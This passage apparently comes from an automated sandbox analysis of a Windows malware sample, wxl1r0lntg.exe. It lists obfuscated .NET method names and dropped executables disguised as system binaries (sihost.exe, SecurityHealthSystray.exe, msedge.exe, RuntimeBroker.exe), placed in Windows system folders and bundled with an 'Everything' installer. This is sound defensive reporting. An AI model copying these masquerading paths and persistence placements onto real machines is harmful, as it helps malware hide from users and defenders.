                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, ksqROUdIIaONFtKYMdk.csHigh entropy of concatenated method names: 'FAtdx1qBwk', 'xso3PwR4s3y3fLtQ7Oq7', 'iY7jh5R4luQ9gx3dBuAM', 'E7rTnYR44f6oblggk2IZ', 'rx96WpR4ccn1YblZk48R', 'sLrdokSXcA', 'ntkPoxR4bE3We1m56bam', 'wPC9yWR4QcvwHV8Qll7v', 'XyRR5MR4XiRWgt98Hehp', 'lgo7TBR467kmXnkuTq8N'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, JxGSMKp9vRN6oXJrPDT.csHigh entropy of concatenated method names: 'F4ppVRyN1g', 'J5tpBUKZnR', 'A5wpNOE6IF', 'RJiVGIRkA0S9Xolfd9ym', 'nZWiqaRkrbDJ4P9FFAw6', 'AnbibiRkeq1Neg7RQ5hH', 'uuApksguQ1', 'd5vp3wVJrv', 'GLcp1Lqmlp', 'A5YtEjRkw0POvi4NnHJn'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, NqDxJdjTK55WjGYGJny.csHigh entropy of concatenated method names: 'sMlj57HcKD', 'thAjwpPQih', 'MfsOk7RvKw6LdB4Np0qZ', 'N4nCktRvED4Di4OByfO2', 'hTI6hVRv7vDspEQxQ9ed', 'bowuvpRvMsFW8s3Otim5', 'xDb0gdRv0DqrXkRhrKu6', 'xBwxqbRvjDvIGPJoeyl1', 'WhXjG05nU2', 'he8fGuRvBYV7rKb1jq3e'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.csHigh entropy of concatenated method names: 'jm4EeFRftWTxZxN3di7U', 'YGUNKBRfCHexAU1l7Jvp', 'XqtvK06aZi', 'ruxt6WRfZ7wMs4sTQtMT', 'cqL0hTRfojm7GvywLqZt', 'nvrM8aRfpG8mS9raSq7a', 'dFbgsWRfx72SqnE314mj', 'UWO5iiRfiInnD9dwIeZv', 'GDKHrORfYj7lptwj7Q8C', 'SRKQ9IRfWiSWLG7C96jq'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, FkqI8I2vfdqrwTMN9lf.csHigh entropy of concatenated method names: 'stO2JNPAUh', 'bQs2zlCd2N', 'dX3gTjYIas', 'mN5gROKWAR', 'TCLgGyEuHv', 'KY0gav18OE', 'Rpx', 'method_4', 'f6W', 'uL1'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, wXh6Jnu4vJy8aP5cfFU.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'iGGRdroDTNc', 'ScUR5Ro7u2g', 'TCCw7vRgDb5r369LAe9X', 'PeCVeTRg8QNjasJJTB6p', 'cXI3PSRgVQc8W7rdWOn4'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, XwZDxK9h00o9lEdFfep.csHigh entropy of concatenated method names: 'y6x9PVXaVp', 'yXjCyGRKIvvjUxoSG0YS', 'Uu9Bi1RKZ8HsxvahgbYh', 'tBgF01RKSaBmTZPVtrNv', 'BqGqtsRKmJC8qw184lbi', 'WJFaAwRKo01NlkHxv6wg', 'IPy', 'method_0', 'method_1', 'method_2'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, wvF8r2XJXErCwbywZoM.csHigh entropy of concatenated method names: 'Ks72Trk4MZ', 'mRi2RapIe6', 'Yd7', 'cVD2GgCkwU', 'TkW2agGFNr', 'dsL25xFCwH', 'LTe2wAQ9sK', 'TVW3ffRFMa5dRBRqbl9r', 'UDtSWcRFOAEjCk38ZmKg', 'Pr6XolRF7hSRfnHNmwtb'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, gOvWKlwnNuG7nqEbbvP.csHigh entropy of concatenated method names: 'q64', 'P9X', 'K5fR5CGdANs', 'vmethod_0', 'B1dRdulFwSg', 'imethod_0', 'Ar3OXdR2EDHTbcIdwmXr', 'OkBtctR20c5QSJ8MGg4k', 'yCJFEgR2jRetbTjf3IaS', 'DOi7UsR2vonJQw5LywdK'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, WETjk3bJKQnl1DGeIyM.csHigh entropy of concatenated method names: 'qRwQTuMh2g', 'elNQRi6CbG', 'QFZQGRnvry', 'pU8QaCN0yy', 'p5pQ55LNqJ', 'XSIQwkfAnu', 'OsB1auRB09vCvE4Kphwe', 'NIkScERBKNO2TRER3dK8', 'j4BgZtRBEpi41OQdivvH', 'jFqxhNRBjSCqDJmAwLb6'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, OwqkP6dr1Bw2fKcVFPS.csHigh entropy of concatenated method names: 't8adAyVEL9', 'RXsdt8sNYI', 'LN3dCvNhFa', 'uG96c1R4p7IXURhWQSjG', 'tRHyLnR4x3tU6er1727T', 'AEeUjQR4ZU0Wfjkpw0O8', 'TVj2fpR4og0LbeGu8KtQ', 'WBBMvSR4ichnxBN8rMa4', 'zFwdd9R4Yo3FGQXHy8O3', 'TeELirR4WuYrP1goK3pW'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, wk7v0AYtMYsmGxc1QK9.csHigh entropy of concatenated method names: 'vUGHRMprV7', 'y6Z3nARDyuTdYbr7EO86', 'pjeI6MRDHtjPP7OnafUk', 'SCyv6FRDPSEacfoGBGV7', 'oZRYSKlrCK', 'MAnYmWce0T', 'n2sYIpXlkP', 'UqlYZUtWCp', 'lKwYo4VBcx', 'KuxYpGnZY9'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, dT785IcslwPY6kCXVCE.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'pGfxTbRMXVCawynOGQOF', 'WL0Na1RMbFBJBk757VOt', 'KIwFCBRMQWiq9mXaGnWf'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, zA1nB72diOQslPTN8YQ.csHigh entropy of concatenated method names: 'qHW2rBRovs', 'ygk2e7kDQS', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'Ne82A53ra2', 'method_2', 'uc7'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, C5GrgwZRu6kXDMRrd8.csHigh entropy of concatenated method names: 'wZ64mE9as', 'Y3KJ8bR64YOXkCwQkMSi', 'OgY9ubR6gn6Gf09TFp4N', 'HKAdxbR6lHtmVJGV3xrV', 'Up5BokR6scn8sJdm7nLY', 'jbBpEoi3i', 'V3axj0tvc', 'EJ0iaSTSY', 'YRFYYWrFt', 'wAUWp38kl'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, XLu2eQX8ommwIjMVSDR.csHigh entropy of concatenated method names: 'mVAXBunQvB', 'fQ5XNOa839', 'pUqXFvNcV2', 'O7oXOfklO2', 'XbwX7SU6Hi', 'UGC1aXRFq8mf4Kqi2DhP', 'yhwE64RF9CKLtrg409l2', 'JfMc2VRFnM9wW6JdJ0Km', 'z7vlxmRFs4mer7w2JemE', 'PItSaIRFcwW6HSntOpe2'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, fvdSK4pKYAyxIlO2MAB.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'SuaRdtZPpnG', 'XPLR5V7Pgce', 'jkIjy9Rkp1kNQEr63SPf', 'WxCAP0RkxoMCqOhIJnOm', 'kfEq0TRkixTxkri38D40', 'pZEo9hRkYJ11ALhZXXuh', 'Klx3WDRkWdb7slxPshYA'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, QYND7H98ZMrwgcvehcg.csHigh entropy of concatenated method names: 'pvLRdPYqERx', 'jOj9B1U9Ha', 'yCg9N9TM7K', 'slF9FZrM0S', 'ITism7RKbiHdNOdLqwEC', 'iCm2JhRKQ6JMpXPmit9B', 'GVWWgtRKX21FxnKfEUTb', 'fQddFcRK2gAUS84Nl15U', 'FeKMHFRKg0kwixSJC36G', 'TO3SFfRKl0J6Sm3MuuyL'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, xod1q05yeYqhNIOuxxn.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'agkRdaKO1KC', 'ScUR5Ro7u2g', 's5FyYSRXbFBgGc1ws4Nd', 'kB5nHYRXQeOPRkJTa8KM', 'q9xWDERXXE3TbWGerAMO'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, qbLnev4OWYkmGb1jedC.csHigh entropy of concatenated method names: 'IgYPpXRMwFxpC0AW0twr', 'C1FylVRMaHco6Rx4DxZR', 'Mkbsl8RM5PBuFpOZ4kNP', 'c7tARBRMuflIP5Q9Y4Yl', 'Hyl4MG31nj', 'Mh9', 'method_0', 'Xx24KZM28j', 'PoQ4EEx6cN', 'GU340R5dmU'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, TYwZ1k02sbPwZFs6oNF.csHigh entropy of concatenated method names: 'qMl0l2Z2sj', 'mmP04KEygY', 'K0d0s6pGpf', 'spH0c3FVj8', 'Dispose', 'MNEV6lRvysdyVcvG0KBv', 'Ph8hfwRvHWhOjRdVdfOx', 'hPyPtORvPWTZXfGaOoJP', 'm5WSY2Rv6h3QDqlZeuTp', 'ai6BxERvLiViZtg3lEE4'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, Qea8xPa6GCJa0qLBbj3.csHigh entropy of concatenated method names: 'k2ga1MmOJj', 'MwxaDe9KJx', 'oISa8oWFUp', 'T8QOX2RQDD0FrNxw5pU8', 'eKxGfnRQ8oZA3qX3GQyF', 'CrfkLBRQ3CD2cUEcK5wM', 'zhiAfNRQ1jpdv0IiyDxU', 'AW1abvMOVp', 'cK7aQAXnDR', 'FCTaXKNfdx'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, iTu4sCyKD4CMYhFbNgj.csHigh entropy of concatenated method names: 'NQAy0kjijh', 'SYWyjTZwIq', 'KjlyvLa8ul', 'NBwakTRVUlfcBnhhRcNu', 'qLr8j9RVweoJpWOGcXff', 'XZSbieRVu6OMdCXJnOEw', 'KKIExRRVdWcJpV40isKK', 'PCngSMRVhcQVSGk2bhIV', 'Hfre2IRVrCsJXuZATDdQ'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, XVrajvxFnpoPojSgadA.csHigh entropy of concatenated method names: 'bBcRdImdiNl', 'kPJx7396Bs', 'eIURdZrw0KL', 'uvTEMHR3W1i4yVJlkTy2', 'XILHxhR3H0Z9dV5E06wS', 'S4YPvNR3isF7l6Ht4oYT', 'DhgKQWR3YKOTFhi24NZr', 'DbeRYLR3Pbf5OmQ3tPGM', 'v8Y45cR3ytw3P2vnLaMc', 'aYlkmKR36jDWxU6tbg9a'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, tpCbM3U3SbZ99kNnjNT.csHigh entropy of concatenated method names: 'Rx1U0EKe3G', 'OquUjaf99J', 'weUjysR4d9d9deB3ngFi', 'cCrNdsR4uCeUmwQP5VK2', 'oNUjdpR4UG5DD4iYm1Fs', 'eE3IIZR4hVDOqi3OYXTW', 'LSQUDGeUDV', 'v5KU8hE5ZC', 'pCOUVOKMAj', 'QBsUBTbGKD'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, XFS78Wksd2we2SEyFlb.csHigh entropy of concatenated method names: 'JnjRTdREEOAQ3YgqZl4K', 'O5XnPrRE0HTXxBNjQHYq', 'OQdEKGREMA31fEYxMAvy', 'gCsLC6REKWoSJwct1Ew4', 'B4W6LdRENIF6yitfkuQy', 'GcfbyFREFPvK4ODpqOpd', 'yLpu1yREODKRfjofVIva', 'SHKsuNREVUBjjnedt44w', 'LclpKFREBnfUh4HeU7WK'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, JsiO0FGOadbXRuWYWRX.csHigh entropy of concatenated method names: 'LtoaUrSu1h', 'YO1QDvRbzJRG79R1Oiai', 'fTV1TXRQTRiH5DaJdYTP', 'HeOeDHRQR6j9UFpgZqdf', 'cjF1ZFRbfkxhpps8XAM3', 'Ve7MdIRbJwxjCqJlGbXx', 'RsQxEbRQGIw7gYDOpnFG', 'sm0lEbRQakYxebIkwvfn', 'TqXaTuOI5C', 'elDaGZGHm4'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, FJZpSowDEyDIxmJhcnJ.csHigh entropy of concatenated method names: 'UENwFOv4hY', 'AAfZgrRghmwj85OYkYEJ', 'psmXQ3RgUFsNIWgmp1vI', 'nWnJGhRgdc8sYw8TeeLv', 'U1J', 'P9X', 'poeR5me6LiL', 'uCWR5I5WRyn', 'IruRdUUQFC3', 'imethod_0'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, e2sHDxH7jo45ET2KG3i.csHigh entropy of concatenated method names: 'CEOHK9oXTJ', 'IrsHEaUHOg', 'EUXH0vLfSn', 'HGjHjHNFHa', 'biMHvqYNx8', 'BMsSJaRDMm7HHc24pELb', 'hGAwyvRDO8kmdwrllb2i', 'dBeLZqRD7xnBqpjIW6Jp', 'DEp0iQRDK2IrPB9iuZgH', 'DQ56S2RDENJnPjLYel29'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, BCa4U9UhMqZu5mUYswU.csHigh entropy of concatenated method names: 'n3wUeTAFNf', 'sE0UAmliM8', 'SXLasNRlSbCfXFT0EVqN', 'drrpIZRlm5U0uQuEucCw', 'z1GDEHRlIxNd5NjfSpZ2', 'M3rFo8RlZm97eQCiT6d7', 'ynKeimRloFAbeL1FnWwu', 'xooYCBRlpYlwrSxpqqkr'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, nrWF5wSWDfUkTG6Oo3Q.csHigh entropy of concatenated method names: 'A2Ept2Ts1w', 'TpopCxln5B', 'Rb5aOoRn3hA0nJMRjEej', 'vgfMNvRnnJZ8Z9mHfBnQ', 'cgOKTHRnkOtmQRVnXcJQ', 'e5EAAHRn140yB1nLBeQL', 'fp4PiERnDlVfB8BCfXcc', 'XMxppqkhgj', 'fgtNUXRnVvpF6p34ZYfp', 'lQUue2RnBfGxPYwAKFZn'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, FVDSuEx92Ikj2nT268M.csHigh entropy of concatenated method names: 'N2N', 'zwERdSOsKwu', 'chYxklNpKh', 'cZoRdm9Igfy', 'awZehUR3A2CqxWbeQpnC', 't96g8VR3t49RIhvc6Eit', 'VAU7SyR3rnvtapq7yDaZ', 'naNhrSR3eh95ymuZnfeH', 'b5YGtgR3CFhdi72yFbFP', 'gGvuC0R3SZq4Qp3YAo5F'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, a7HgnLKqLqbec16Jkgd.csHigh entropy of concatenated method names: 'dhYRd6KEG0s', 'oL7RuyswXjq', 'K1r1nyRjSUIB8A6xfGEu', 'YjUlb8RjtuAIXR8rvZN0', 'Vk3XBPRjCM7KYLNrq1a0', 'Osb1GiRjmjwVXQQwZqtc', 'gxGGFfRjpi0nUFy8Ynf5', 'rhXfWxRjZ4J4kniJk6Hw', 'tD1wx5RjowGNQZ31faqn', 'hJOWSBRjxGdYdlvadXT6'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jYpIpJlsS5onpTLE6Mk.csHigh entropy of concatenated method names: 'Close', 'qL6', 'vTelq1dw8C', 'T9vl9MloEB', 'P9nlnwakPS', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, eJRl910thNPACLO9iS7.csHigh entropy of concatenated method names: 'ciF0mSl4kJ', 'wB20p4xtT4', 'Lyy0YTSWPp', 'Wvq0WbMtYO', 'W3j0HGGlPj', 'Ken0PRAys5', 'BlM0yu4pPp', 'rR50604AYb', 'Dispose', 'uTbGBWRvoCk3xHHXl05m'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, ITkjdJdVT36Jo6sPrsZ.csHigh entropy of concatenated method names: 'gTnd0LGs1w', 'V6jBxBRstF6CANVREkdb', 'eIseRERsCkA5yC5J1fjA', 'cNnJJyRsSyCIam53kkWx', 'lj5xKuRsmr0PuNN9CLdk', 'P9X', 'vmethod_0', 'WiQR5LHMOnE', 'imethod_0', 'tCu8D7Rshxt9GuvkSHek'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, zM3pgAG2gSbH4mZRVuU.csHigh entropy of concatenated method names: 'K9VG399Ijy', 'BnQG1dCWm2', 'mx1YZVRbc3SF0EwCD7ic', 'IZn8K2Rb4n92qZ8YX9pl', 'DmPEgjRbs1Tw24HhQ1MP', 'gdlcf4RbqEa08dtvgPsO', 'wM1GBruj1q', 'YJWG6gRb3GfykldVIB7V', 'VSASdlRb1sMGp20vyeoZ', 'Me6hCNRbnA3uAf82RkLL'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, c4J79dbMitYbKjJM7Xi.csHigh entropy of concatenated method names: 'RUCbEf54kh', 'HtZb0rArPB', 'jDrbj5GoTn', 'pEnbvRpyTo', 'uLnbfIHTlj', 'Q17neYRBVQdu8ikst6Lt', 'mDcxV0RBBK0xpaNttOtV', 'n0hW3NRBNUncMXy74e7B', 'c3xMTqRBFXNIWOvXAEhe', 'MR1hnDRBOVhayJiS4Vs8'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, l1PTLHL3Vd1XBoZU6Ij.csHigh entropy of concatenated method names: 'Gj4LfxvBBc', 'KCZLzF0cAc', 'uH3LDITdj2', 'CI7L8DqyDc', 's8lLVTC7XL', 'hRTLBo1uwY', 'iNrLNQRgWP', 'a7KLFkICmx', 'Hr9LOgdLhw', 'v5ML7folTm'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, WrQyYXznEVAv11M91k.csHigh entropy of concatenated method names: 'DDYRRnEPfp', 'VLXRaL51AD', 'PDER5ZhqUN', 'Sl7RwpdGb1', 'UhlRuCgs0W', 'tHgRUEOfYW', 'VP8Rhcj79V', 'GTGni4RLhG0afrAgpAYy', 'YOZWAFRLraGKPegxUg7j', 'FMjF2cRLeVWoxUUbYuO6'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, Mp6uT8aOJaqvbH7EpGs.csHigh entropy of concatenated method names: 'dFh5a1XFaW', 'Vbg55wM2tJ', 'Sca5wYh4xK', 'nB6HJDRXuPy59Jiw5wuT', 'RQmf4aRXULtJ5H9Nuac7', 'WM3KGlRX5FmyBnppjKb8', 'lFhZTwRXwT9JehGob76S', 'Uro5eRbpuM', 'Dd7qj4RXhcJnAGrekul7', 'UG20BvRXrutR1YL2yWpA'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, YLkGw6yHpmr1g8m9JcP.csHigh entropy of concatenated method names: 'E0oyyh8XY4', 'UdXy66CTSr', 'rgpyLVNqCC', 'ykUyby0AEM', 'xg6yQaHQyb', 'N5h8JOR8EwV14lnMH9cD', 'f2SKIOR8MjWTblI1NAtT', 'oe6fyjR8KR4ANdHOw7Nd', 'tsDKYOR80vZC1Phx8jY5', 'AmdEHSR8juglgrBjIBFW'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, XEdPQAnjZwNhL1JZWhP.csHigh entropy of concatenated method names: 'wLvnfyT5Au', 'vp7nJdeO4e', 'lrAnzOE0eI', 'P3GkTlLDNo', 'trpkRZ3J87', 'cyQkGFfbM3', 'kEJkaopQOp', 'NyCk5gNX61', 'PZwkwsmFGL', 'JwOkunkcyf'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, BsaKlUPDp4MXUqAchMX.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'ur5PVyrbbP', 'gIwPB3n8eP', 'Dispose', 'D31', 'wNK'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, gYx1eCpbX7CjbdVGt41.csHigh entropy of concatenated method names: 'hvspcUpaCq', 'vld4fDRkGi4JiXYkSjR1', 'ggejaARkT2f44xLYVDwF', 'Njse68RkROdJcotYjfQJ', 'h0ymKxRkaCuA9i6aBDIC', 'vBQpXlR3Mx', 'o5mp25y8JE', 'V4SpgIjBGV', 'xyOhNmRnfvsgOlBMANqH', 'ua7EqBRnjJlEIC58CUqG'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, vapj2vLauP0UiTiOtsY.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'YlfLwhb9lM', 'Write', 'BQBLuPhQQa', 'Vn7LUj9MwZ', 'Flush', 'vl7'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, vuoEqF62QE2bR2PbAjh.csHigh entropy of concatenated method names: 'method_0', 'eqd6lUws2H', 'A7N64q24II', 'sSL6sxwu7d', 'Wqk6c6sgM2', 'fOI6qmR8Zv', 'OV269MbXfp', 'rP9X7URVHRuvGIc960GN', 'UDxAGLRVYcWkSFbrViIK', 'oOaHmDRVWCDnEniBjsGp'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, nH7QvCwhBS4kFettptc.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'xX6Rdw8pNpt', 'ScUR5Ro7u2g', 'Mamql4R2i8uEjjrb1log', 'fX1DgxR2YlUfDDRikwqV', 'I4vClaR2WMPB1aT3qRwf', 'FonnB8R2HmPmaxAnogdJ'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, CM19gvfo8mmpSKk935A.csHigh entropy of concatenated method names: 'pNJfQKa6nf', 'Bi8fXIs3ZZ', 'U9Bf2sqh2o', 'xQOfgDOAia', 'cmFflQjBZ0', 'NKQf4MR3MU', 'GgMfs0hs9J', 'ketfcOJPw4', 'uv0fq7ppat', 'COUf9sWjFv'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, tsC17V5nFuamyflcnrD.csHigh entropy of concatenated method names: 'wJC5fFxVXU', 'LX1DP6R2UpEmEmIQfkPh', 'wMGQEgR2dg7iUaDvsryq', 'AkoWVuR2wWytjNi4R0v6', 'gGgRhlR2uwJQ9gUiEZer', 'ATXk9FR2AZVWu4ArlafU', 'ylWaZ0R2r0RlGbmylUHe', 'Jmj1ZGR2eHHBhfGJ06c7', 'fgMyG8R2tawKw02QXxoT', 'vDfwucmAKc'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, A6GkR7Ege0JSZ23sX4J.csHigh entropy of concatenated method names: 'BeVE4hyA3N', 'bhOEsqFUjR', 'OtBEc1EHX5', 'o50Eqg285P', 'rqBE9FK98W', 'bieEnhdGDL', 'be9EkFFWJi', 'IW3E3tumfw', 'ULDE1vljPf', 'JHVEDllMZZ'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, khsIPrhH15PMgALQQgY.csHigh entropy of concatenated method names: 'jMEaKIRqlJNsxX5euddg', 'qC8aYjRq27xo4cyefTgN', 'x2JXeJRqgeeGhXEHUuuC', 'Knr13tRq4mD3679aSqxJ', 'aeSCJli7hD', 'wydNjbRqckHNIvlhUp5s', 'rQdKeORqqpZ4ikwJfGa6', 'qkvNE8Rq91pBRZjO1TWW', 'dSp24gRqn1i106mr4B3O', 'KnqSRVgf09'

                                Persistence and Installation Behavior

                                barindex
                                Source: unknownExecutable created and started: C:\Windows\apppatch\CustomSDB\sihost.exe
                                Source: C:\Program Files\Everything\Everything.exeExecutable created and started: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                Source: unknownExecutable created and started: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\pGGHecbL.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\GEAmOcnc.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\TDoLDJFD.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile created: C:\Users\user\AppData\Local\Temp\drivEn760.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\apppatch\CustomSDB\sihost.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\utYFHYqz.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\ANcNpKUT.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\phhpjhAr.logJump to dropped file
                                Source: C:\Users\user\Desktop\wxl1r0lntg.exeFile created: C:\Users\user\AppData\Local\Temp\sqls211.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\LangDLL.dllJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\fXnruzVd.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\System.dllJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\otdhyUEt.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeFile created: C:\Program Files\Everything\Everything.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Program Files\Everything\Everything.exe.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\dFyrOIJL.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Uninstall.exeJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\WteBKGGw.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeFile created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeFile created: C:\Program Files\Everything\Uninstall.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\hwphVFJE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\InstallOptions.dllJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\qeIxFhOl.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
